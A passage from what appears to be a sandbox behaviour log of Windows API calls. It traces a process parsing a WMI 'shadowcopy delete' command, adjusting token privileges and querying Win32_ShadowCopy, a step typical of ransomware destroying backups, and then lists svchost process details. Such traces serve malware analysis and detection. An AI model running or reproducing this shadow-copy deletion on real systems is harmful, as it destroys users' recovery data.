pVal=0x1ef480*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x347fa8, varVal2=0x16cc00), pType=0x0, plFlavor=0x0) returned 0x0 [0092.250] free (_Block=0x16cba0) [0092.250] ??1CHString@@QEAA@XZ () returned 0x7fef877482c [0092.250] IUnknown:Release (This=0x1f409c0) returned 0x1 [0092.250] GetCurrentThreadId () returned 0x4fc [0092.251] ??0CHString@@QEAA@XZ () returned 0x1ef458 [0092.251] malloc (_Size=0x18) returned 0x16cba0 [0092.251] IWbemClassObject:Get (in: This=0x1f404e0, wszName="__RELPATH", lFlags=0, pVal=0x1ef480*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x347fa8, varVal2=0xd), pType=0x0, plFlavor=0x0 | out: pVal=0x1ef480*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"ShadowCopy\"", varVal2=0xd), pType=0x0, plFlavor=0x0) returned 0x0 [0092.251] free (_Block=0x16cba0) [0092.251] malloc (_Size=0x18) returned 0x16cba0 [0092.251] GetCurrentThreadId () returned 0x4fc [0092.251] ??0CHString@@QEAA@XZ () returned 0x1ef2d8 [0092.251] ??0CHString@@QEAA@PEBG@Z () returned 0x1ef2f0 [0092.251] ??0CHString@@QEAA@AEBV0@@Z () returned 0x1ef280 [0092.251] ?Empty@CHString@@QEAAXXZ () returned 0x7fef877482c [0092.251] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x16cdd0 [0092.251] ?Find@CHString@@QEBAHPEBG@Z () returned 0x1b [0092.251] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x1ef240 [0092.251] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x1ef288 [0092.251] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x1ef2f0 [0092.251] ??1CHString@@QEAA@XZ () returned 0x729b0401 [0092.251] ??1CHString@@QEAA@XZ () returned 0x729b0401 [0092.252] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x1ef248 [0092.252] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x1ef280 [0092.252] ??1CHString@@QEAA@XZ () returned 0x1 [0092.252] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x16ce40 [0092.252] ?Find@CHString@@QEBAHPEBG@Z () returned 0xa [0092.252] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x1ef240 [0092.252] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x1ef288 [0092.252] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x1ef2f0 [0092.252] ??1CHString@@QEAA@XZ () returned 0x729b0401 [0092.252] ??1CHString@@QEAA@XZ () returned 0x729b0401 [0092.252] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x1ef248 [0092.252] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x1ef280 [0092.252] ??1CHString@@QEAA@XZ () returned 0x7fef877482c [0092.252] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x7fef8774820 [0092.252] ??1CHString@@QEAA@XZ () returned 0x7fef877482c [0092.252] malloc (_Size=0x18) returned 0x16cbc0 [0092.252] malloc (_Size=0x18) returned 0x16cc20 [0092.252] malloc (_Size=0x18) returned 0x16cc40 [0092.252] malloc (_Size=0x18) returned 0x16cc60 [0092.252] malloc (_Size=0x18) returned 0x16cc80 [0092.252] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0092.252] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0092.252] malloc (_Size=0x18) returned 0x16cca0 [0092.252] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0092.252] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x29 [0092.252] malloc (_Size=0x18) returned 0x16ccc0 [0092.252] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x7c [0092.253] SysStringLen (param_1="\"") returned 0x1 [0092.253] free (_Block=0x16cca0) [0092.253] free (_Block=0x16cc80) [0092.253] free (_Block=0x16cc60) [0092.253] free (_Block=0x16cc40) [0092.253] free (_Block=0x16cc20) [0092.253] free (_Block=0x16cbc0) [0092.253] IWbemServices:GetObject (in: This=0x1f33b28, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x1ef2c8*=0x0, ppCallResult=0x0 | out: ppObject=0x1ef2c8*=0x1f40a50, ppCallResult=0x0) returned 0x0 [0092.257] malloc (_Size=0x18) returned 0x16cbc0 [0092.257] IWbemClassObject:Get (in: This=0x1f40a50, wszName="Text", lFlags=0, pVal=0x1ef300*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x100062ac0, varVal2=0x18), pType=0x0, plFlavor=0x0 | out: pVal=0x1ef300*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3474c0*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x2cdff0, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x18), pType=0x0, plFlavor=0x0) returned 0x0 [0092.257] free (_Block=0x16cbc0) [0092.257] SafeArrayGetLBound (in: psa=0x3474c0, nDim=0x1, plLbound=0x1ef2e0 | out: plLbound=0x1ef2e0) returned 0x0 [0092.257] SafeArrayGetUBound (in: psa=0x3474c0, nDim=0x1, plUbound=0x1ef2d0 | out: plUbound=0x1ef2d0) returned 0x0 [0092.257] SafeArrayGetElement (in: psa=0x3474c0, rgIndices=0x1ef2c4, pv=0x1ef318 | out: pv=0x1ef318) returned 0x0 [0092.257] malloc (_Size=0x18) returned 0x16cbc0 [0092.257] malloc (_Size=0x18) returned 0x16cc20 [0092.257] SysStringLen (param_1="Shadow copy management.") returned 0x17 [0092.257] free (_Block=0x16cbc0) [0092.257] IUnknown:Release (This=0x1f40a50) returned 0x0 [0092.257] free (_Block=0x16ccc0) [0092.257] ??1CHString@@QEAA@XZ () returned 0x729b0401 [0092.257] ??1CHString@@QEAA@XZ () returned 0x7fef877482c [0092.257] free (_Block=0x16cba0) [0092.257] ??1CHString@@QEAA@XZ () returned 0x7fef877482c [0092.257] lstrlenW (lpString="Shadow copy management.") returned 23 [0092.257] malloc (_Size=0x30) returned 0x1685c0 [0092.257] lstrlenW (lpString="Shadow copy management.") returned 23 [0092.257] free (_Block=0x16cc20) [0092.257] IUnknown:Release (This=0x1f404e0) returned 0x0 [0092.257] free (_Block=0x16cbe0) [0092.257] ??1CHString@@QEAA@XZ () returned 0x7fef877482c [0092.257] lstrlenW (lpString="PATH") returned 4 [0092.257] lstrlenW (lpString="delete") returned 6 [0092.258] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="PATH", cchCount2=4) returned 1 [0092.258] lstrlenW (lpString="WHERE") returned 5 [0092.258] lstrlenW (lpString="delete") returned 6 [0092.258] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="WHERE", cchCount2=5) returned 1 [0092.258] lstrlenW (lpString="(") returned 1 [0092.258] lstrlenW (lpString="delete") returned 6 [0092.258] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="(", cchCount2=1) returned 3 [0092.258] lstrlenW (lpString="/") returned 1 [0092.258] lstrlenW (lpString="delete") returned 6 [0092.258] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0092.258] lstrlenW (lpString="-") returned 1 [0092.258] lstrlenW (lpString="delete") returned 6 [0092.258] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0092.258] malloc (_Size=0x18) returned 0x16cbe0 [0092.258] lstrlenW (lpString="GET") returned 3 [0092.258] lstrlenW (lpString="delete") returned 6 [0092.258] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0092.258] lstrlenW (lpString="LIST") returned 4 [0092.258] lstrlenW (lpString="delete") returned 6 [0092.258] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0092.258] lstrlenW (lpString="SET") returned 3 [0092.258] lstrlenW (lpString="delete") returned 6 [0092.258] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0092.258] lstrlenW (lpString="CREATE") returned 6 [0092.258] lstrlenW (lpString="delete") returned 6 [0092.258] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0092.258] lstrlenW (lpString="CALL") returned 4 [0092.258] lstrlenW (lpString="delete") returned 6 [0092.258] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0092.258] lstrlenW (lpString="ASSOC") returned 5 [0092.258] lstrlenW (lpString="delete") returned 6 [0092.259] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0092.259] lstrlenW (lpString="DELETE") returned 6 [0092.259] lstrlenW (lpString="delete") returned 6 [0092.259] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0092.259] free (_Block=0x16cbe0) [0092.259] lstrlenW (lpString="/") returned 1 [0092.259] lstrlenW (lpString="delete") returned 6 [0092.259] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0092.259] lstrlenW (lpString="-") returned 1 [0092.259] lstrlenW (lpString="delete") returned 6 [0092.259] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0092.259] lstrlenW (lpString="delete") returned 6 [0092.259] malloc (_Size=0xe) returned 0x16cbe0 [0092.259] lstrlenW (lpString="delete") returned 6 [0092.259] lstrlenW (lpString="GET") returned 3 [0092.259] lstrlenW (lpString="delete") returned 6 [0092.259] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0092.259] lstrlenW (lpString="LIST") returned 4 [0092.259] lstrlenW (lpString="delete") returned 6 [0092.259] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0092.259] lstrlenW (lpString="SET") returned 3 [0092.259] lstrlenW (lpString="delete") returned 6 [0092.259] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0092.259] lstrlenW (lpString="CREATE") returned 6 [0092.259] lstrlenW (lpString="delete") returned 6 [0092.259] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0092.259] lstrlenW (lpString="CALL") returned 4 [0092.259] lstrlenW (lpString="delete") returned 6 [0092.259] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0092.259] lstrlenW (lpString="ASSOC") returned 5 [0092.259] lstrlenW (lpString="delete") returned 6 [0092.259] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0092.259] lstrlenW (lpString="DELETE") returned 6 [0092.259] lstrlenW (lpString="delete") returned 6 [0092.259] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0092.260] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0092.260] malloc (_Size=0x3e) returned 0x16cdd0 [0092.260] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0092.260] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff60 | out: _String="Select", _Context=0xffffffffffffff60) returned="Select" [0092.260] malloc (_Size=0x18) returned 0x16cc20 [0092.260] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x0 | out: _String=0x0, _Context=0x0) returned="*" [0092.260] lstrlenW (lpString="FROM") returned 4 [0092.260] lstrlenW (lpString="*") returned 1 [0092.260] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0092.260] malloc (_Size=0x18) returned 0x16cba0 [0092.260] free (_Block=0x16cc20) [0092.260] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3a00780008 | out: _String=0x0, _Context=0x3a00780008) returned="from" [0092.260] lstrlenW (lpString="FROM") returned 4 [0092.260] lstrlenW (lpString="from") returned 4 [0092.260] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0092.260] malloc (_Size=0x18) returned 0x16cc20 [0092.260] free (_Block=0x16cba0) [0092.260] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3b00780008 | out: _String=0x0, _Context=0x3b00780008) returned="Win32_ShadowCopy" [0092.260] malloc (_Size=0x18) returned 0x16cba0 [0092.260] free (_Block=0x16cc20) [0092.260] free (_Block=0x16cdd0) [0092.260] free (_Block=0x16cba0) [0092.260] lstrlenW (lpString="SET") returned 3 [0092.260] lstrlenW (lpString="delete") returned 6 [0092.260] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0092.260] lstrlenW (lpString="CREATE") returned 6 [0092.260] lstrlenW (lpString="delete") returned 6 [0092.260] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0092.261] free (_Block=0x16cae0) [0092.261] malloc (_Size=0x8) returned 0x16cdd0 [0092.261] lstrlenW (lpString="GET") returned 3 [0092.261] lstrlenW (lpString="delete") returned 6 [0092.261] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0092.261] lstrlenW (lpString="LIST") returned 4 [0092.261] lstrlenW (lpString="delete") returned 6 [0092.261] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0092.261] lstrlenW (lpString="ASSOC") returned 5 [0092.261] lstrlenW (lpString="delete") returned 6 [0092.261] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0092.261] WbemLocator:IUnknown:AddRef (This=0x1f21390) returned 0x3 [0092.261] free (_Block=0x166a40) [0092.261] lstrlenW (lpString="") returned 0 [0092.261] lstrlenW (lpString="XDUWTFONO") returned 9 [0092.261] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0092.261] lstrlenW (lpString="XDUWTFONO") returned 9 [0092.261] malloc (_Size=0x14) returned 0x16cae0 [0092.261] lstrlenW (lpString="XDUWTFONO") returned 9 [0092.261] GetCurrentThreadId () returned 0x4fc [0092.261] GetCurrentProcess () returned 0xffffffffffffffff [0092.261] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x1ef6a0 | out: TokenHandle=0x1ef6a0*=0x250) returned 1 [0092.261] GetTokenInformation (in: TokenHandle=0x250, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1ef698 | out: TokenInformation=0x0, ReturnLength=0x1ef698) returned 0 [0092.261] malloc (_Size=0x118) returned 0x16cdf0 [0092.261] GetTokenInformation (in: TokenHandle=0x250, TokenInformationClass=0x3, TokenInformation=0x16cdf0, TokenInformationLength=0x118, ReturnLength=0x1ef698 | out: TokenInformation=0x16cdf0, ReturnLength=0x1ef698) returned 1 [0092.261] AdjustTokenPrivileges (in: TokenHandle=0x250, DisableAllPrivileges=0, NewState=0x16cdf0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=2107311876, Attributes=0xe9cb), (Luid.LowPart=0x0, Luid.HighPart=1468992, Attributes=0x0), (Luid.LowPart=0x22, Luid.HighPart=150995722, Attributes=0xe9dc), (Luid.LowPart=0x0, Luid.HighPart=1442136, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0092.261] free (_Block=0x16cdf0) [0092.261] CloseHandle (hObject=0x250) returned 1 [0092.261] lstrlenW (lpString="GET") returned 3 [0092.261] lstrlenW (lpString="delete") returned 6 [0092.261] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0092.261] lstrlenW (lpString="LIST") returned 4 [0092.261] lstrlenW (lpString="delete") returned 6 [0092.262] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0092.262] lstrlenW (lpString="SET") returned 3 [0092.262] lstrlenW (lpString="delete") returned 6 [0092.262] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0092.262] lstrlenW (lpString="CALL") returned 4 [0092.262] lstrlenW (lpString="delete") returned 6 [0092.262] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0092.262] lstrlenW (lpString="ASSOC") returned 5 [0092.262] lstrlenW (lpString="delete") returned 6 [0092.262] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0092.262] lstrlenW (lpString="CREATE") returned 6 [0092.262] lstrlenW (lpString="delete") returned 6 [0092.262] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0092.262] lstrlenW (lpString="DELETE") returned 6 [0092.262] lstrlenW (lpString="delete") returned 6 [0092.262] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0092.264] malloc (_Size=0x18) returned 0x16cba0 [0092.264] lstrlenA (lpString="") returned 0 [0092.264] malloc (_Size=0x2) returned 0x166a40 [0092.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffff314c, cbMultiByte=-1, lpWideCharStr=0x166a40, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0092.264] free (_Block=0x166a40) [0092.264] malloc (_Size=0x18) returned 0x16cc20 [0092.264] lstrlenA (lpString="") returned 0 [0092.264] malloc (_Size=0x2) returned 0x166a40 [0092.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffff314c, cbMultiByte=-1, lpWideCharStr=0x166a40, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0092.264] free (_Block=0x166a40) [0092.264] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0092.264] malloc (_Size=0x3e) returned 0x16cdf0 [0092.264] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0092.264] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff40 | out: _String="Select", _Context=0xffffffffffffff40) returned="Select" [0092.264] malloc (_Size=0x18) returned 0x16ccc0 [0092.264] free (_Block=0x16cc20) [0092.264] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3f00680007 | out: _String=0x0, _Context=0x3f00680007) returned="*" [0092.264] lstrlenW (lpString="FROM") returned 4 [0092.264] lstrlenW (lpString="*") returned 1 [0092.264] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0092.264] malloc (_Size=0x18) returned 0x16cc20 [0092.264] free (_Block=0x16ccc0) [0092.264] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x4000680007 | out: _String=0x0, _Context=0x4000680007) returned="from" [0092.265] lstrlenW (lpString="FROM") returned 4 [0092.265] lstrlenW (lpString="from") returned 4 [0092.265] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0092.265] malloc (_Size=0x18) returned 0x16ccc0 [0092.265] free (_Block=0x16cc20) [0092.265] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x4100680007 | out: _String=0x0, _Context=0x4100680007) returned="Win32_ShadowCopy" [0092.265] malloc (_Size=0x18) returned 0x16cc20 [0092.265] free (_Block=0x16ccc0) [0092.265] free (_Block=0x16cdf0) [0092.265] malloc (_Size=0x18) returned 0x16ccc0 [0092.265] malloc (_Size=0x18) returned 0x16cbc0 [0092.265] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0092.265] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0092.265] free (_Block=0x16cba0) [0092.265] free (_Block=0x16ccc0) [0092.265] ??0CHString@@QEAA@XZ () returned 0x1ef610 [0092.265] GetCurrentThreadId () returned 0x4fc [0092.265] malloc (_Size=0x18) returned 0x16ccc0 [0092.265] malloc (_Size=0x18) returned 0x16cba0 [0092.265] malloc (_Size=0x18) returned 0x16cc40 [0092.265] malloc (_Size=0x18) returned 0x16cc60 [0092.265] malloc (_Size=0x18) returned 0x16cc80 [0092.265] SysStringLen (param_1="\\\\") returned 0x2 [0092.265] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0092.265] malloc (_Size=0x18) returned 0x16cca0 [0092.266] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0092.266] SysStringLen (param_1="\\") returned 0x1 [0092.266] malloc (_Size=0x18) returned 0x16cce0 [0092.266] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0092.266] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0092.266] free (_Block=0x16cca0) [0092.266] free (_Block=0x16cc80) [0092.266] free (_Block=0x16cc60) [0092.266] free (_Block=0x16cc40) [0092.266] free (_Block=0x16cba0) [0092.266] free (_Block=0x16ccc0) [0092.266] malloc (_Size=0x18) returned 0x16ccc0 [0092.266] malloc (_Size=0x18) returned 0x16cba0 [0092.266] malloc (_Size=0x18) returned 0x16cc40 [0092.266] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1f21390, strNetworkResource="\\\\XDUWTFONO\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1000629d0 | out: ppNamespace=0x1000629d0*=0x1f33c18) returned 0x0 [0092.272] free (_Block=0x16cc40) [0092.272] free (_Block=0x16cba0) [0092.272] free (_Block=0x16ccc0) [0092.272] CoSetProxyBlanket (pProxy=0x1f33c18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0092.272] free (_Block=0x16cce0) [0092.272] ??1CHString@@QEAA@XZ () returned 0x7fef877482c [0092.272] ??0CHString@@QEAA@XZ () returned 0x1ef560 [0092.272] GetCurrentThreadId () returned 0x4fc [0092.272] malloc (_Size=0x18) returned 0x16cce0 [0092.272] lstrlenA (lpString="") returned 0 [0092.272] malloc (_Size=0x2) returned 0x166a40 [0092.272] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffff314c, cbMultiByte=-1, lpWideCharStr=0x166a40, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0092.272] free (_Block=0x166a40) [0092.272] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy") returned 0x1e [0092.272] SysStringLen (param_1="") returned 0x0 [0092.272] free (_Block=0x16cce0) [0092.272] malloc (_Size=0x18) returned 0x16cce0 [0092.272] IWbemServices:ExecQuery (This=0x1f33c18, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_ShadowCopy", lFlags=0, pCtx=0x0, ppEnum=0x1ef568) Thread: id = 120 os_tid = 0x738 Thread: id = 121 os_tid = 0x6d0 Thread: id = 122 os_tid = 0x41c Thread: id = 123 os_tid = 0x56c Thread: id = 124 os_tid = 0x878 Process: id = "9" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x910c000" os_pid = "0x124" os_integrity_level = "0x4000" os_privileges = "0x60a00000" monitor_reason = "rpc_server" parent_id = "6" os_parent_pid = "0x3f8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k NetworkService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\CryptSvc" [0xa], "NT SERVICE\\Dnscache" [0xe], "NT SERVICE\\LanmanWorkstation" [0xa], "NT SERVICE\\napagent" [0xa], "NT SERVICE\\NlaSvc" [0xa], "NT SERVICE\\TapiSrv" [0xa], "NT SERVICE\\TermService" [0xa], "NT SERVICE\\Wecsvc" [0xa], "NT SERVICE\\WinRM" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e1c4" [0xc000000f], "LOCAL" [0x7] Thread: id = 134 os_tid = 0xbac Thread: id = 135 os_tid = 0xa78 Thread: id = 136 os_tid = 0x9d0 Thread: id = 137 os_tid = 0x8ec Thread: id = 138 os_tid = 0x8e8 Thread: id = 139 os_tid = 0x754 Thread: id = 140 os_tid = 0x704 Thread: id = 141 os_tid = 0x6e0 Thread: id = 142 os_tid = 0x6b0 Thread: id = 143 os_tid = 0x698 Thread: id = 144 os_tid = 0x678 Thread: id = 145 os_tid = 0x630 Thread: id = 146 os_tid = 0x610 Thread: id = 147 os_tid = 0x14c Thread: id = 148 os_tid = 0x140 Thread: id = 149 os_tid = 0x158 Thread: id = 150 os_tid = 0x294 Thread: id = 151 os_tid = 0x218 Thread: id = 152 os_tid = 0x230 Thread: id = 153 os_tid = 0x21c Thread: id = 154 os_tid = 0x1c4 Thread: id = 182 os_tid = 0x934 Thread: id = 187 os_tid = 0x920 Thread: id = 188 os_tid = 0x900 Process: id = "10" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x8bed000" os_pid = "0x334" os_integrity_level = "0x4000" os_privileges = "0x60b16080" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x36c" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AudioEndpointBuilder" [0xe], "NT SERVICE\\CscService" [0xa], "NT SERVICE\\dot3svc" [0xa], "NT SERVICE\\hidserv" [0xa], "NT SERVICE\\HomeGroupListener" [0xa], "NT SERVICE\\IPBusEnum" [0xa], "NT SERVICE\\Netman" [0xa], "NT SERVICE\\PcaSvc" [0xa], "NT SERVICE\\StorSvc" 